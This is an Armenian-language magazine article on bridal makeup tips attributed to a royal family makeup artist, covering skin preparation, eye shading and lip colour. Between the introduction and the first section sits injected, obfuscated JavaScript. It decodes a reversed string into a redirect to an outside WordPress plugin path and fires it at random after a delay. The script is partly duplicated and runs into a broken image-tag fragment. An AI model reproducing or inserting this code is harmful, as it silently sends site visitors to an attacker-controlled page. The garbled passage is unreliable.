Հարսանեկան դիմահարդարման խորհուրդներ թագավորական ընտանիքի դիմահարդարից

Հաննա Մարտինը արդեն մի քանի տարի է հանդիսանում է թագավորական ընտանիքի դիմահարդարը և հենց Հաննան է ստեղծել դքսուհի Քեյթ Միդլթոնի հարսանեկան կերպարը։ Հաննա Մարտինը նաև հանդիսանում է արքայադուստր Եվգենիայի կերպարի հեղինակը։ Դիմահարդարը կիսվել է հարսանեկան դիմահարդարման գլխավոր հնարքներով և գաղտնիքներով։

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton-779×1024.jpg” alt=”” width=”577″ height=”758″ />

Դեմք

Ըստ Հաննայի դիմահարդարման գլխավոր հիմքը մաշկը նախապատրաստելն է։ Դիմահարդարը խորհուրդ է տալիս խոնավեցնել մաշկը մինչ դիմահարդարման անցնելը։ Հաննան նշում է, որ եթե Դուք կամ Ձեր դիմահարդարը այս քայլը բաց թողնեն, ապա տոնային քսուքը անհարթ կլինի մաշկի վրա։

Ինչպես նշում է Հաննան, շատ կարևոր է ճիշտ ընտրություն կատարել տոնային քսուքի հարցում և չմոռանալ դիմահարդարման դիմացկունության մասին։ Դիմահարդարը խորհուրդ է տալիս դիմահարդարումը ֆիքսել դիմափոշու շնորհիվ, ապա հատուկ սփրեյ անել, որպեսզի այն թարմ տեսք ունենա ամբողջ օրվա ընթացքում։

Աչքեր

Հաննան խորհուրդ է տալիս աչքերն ընդգծել նուրբ երանգներով՝ մարմնագույն, բրոնզե գույն, վարդագույն, շագանակագույն գույներով։ Ապա հայլայթեր անել աչքի ներքին անկյունի վրա, որպեսզի հայացքն ավելի արտահայտիչ դառնա, ինչպես նաև սև կամ շագանակահույն աչքի մատիտով ընդգծել թարթիչների ուրվագիծը։ Դիմահարդարը նշել է, որ աչքերի դիմահարդարումը պետք է համապատասխանի հարսանեկան արարողության ոճին։

Շրթունքներ

Ըստ Հաննայի հարսանեկան դիմահարդարումն ավելի գեղեցիկ և նուրբ կդարձնի թափանցիկ և փայլ ունեցող շրթներկը։ Հաննան նշել է, որ երբեմն տեսնում է հարսանեկան դիմահարդարումները, որտեղ օգտագործված է մուգ գույն ունեցող շրթներկ։ Նա կարծում է, որ մուգ շրթներկը տարիքով ավելի մեծ է ցույց տալիս հարսնացուներին։

Սակայն դիմահարդարը նշում է, որ շրթներկի ընտրությունը շատ անհատական է և պետք է առաջնորդվել միայն հարսնացուի նախասիրություններով և ընտրել այնպիսի գույն, որով նա իրեն գեղեցիկ և վստահ կզգա։

Աղբյուր՝ glamour.ru